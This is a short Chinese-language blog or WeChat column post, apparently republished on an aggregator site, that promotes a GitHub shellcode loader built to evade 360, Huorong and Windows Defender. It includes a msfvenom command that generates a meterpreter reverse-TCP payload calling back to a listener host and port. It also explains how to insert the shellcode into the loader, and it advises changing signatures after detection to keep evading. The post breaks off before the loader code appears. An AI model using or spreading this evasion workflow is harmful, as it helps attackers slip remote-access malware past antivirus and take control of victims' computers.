专栏名称: 渗透师老A
不一样的角度学习五花八门的渗透技巧,了解安全圈背后的故事
目录
相关文章推荐
海西晨报  ·  深夜,集体大跌! ·  10 小时前  
51好读  ›  专栏  ›  渗透师老A

免杀ShellCode加载器 ,360、火绒、Windows Defender

渗透师老A  · 公众号  ·  · 2022-12-12 10:10

正文

作者: Axx8


Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,作者的 github 保持更新,可以去瞅瞅。


项目地址: https://github.com/Axx8/Bypass_AV

环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows DefenderWindows 10 64位 360&火绒&Windows DefenderWindows 7 64位 或以上操作系统应该都没问题(没有测试)


该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!


代码未经过大量测试,如发现问题请提交 issue。

使用msfvenom

生成ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

注意:ShellCode 需要是64位的



加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处


注意:保留原始ShellCode 里的双引号 "


示例:



最终格式:








请到「今天看啥」查看全文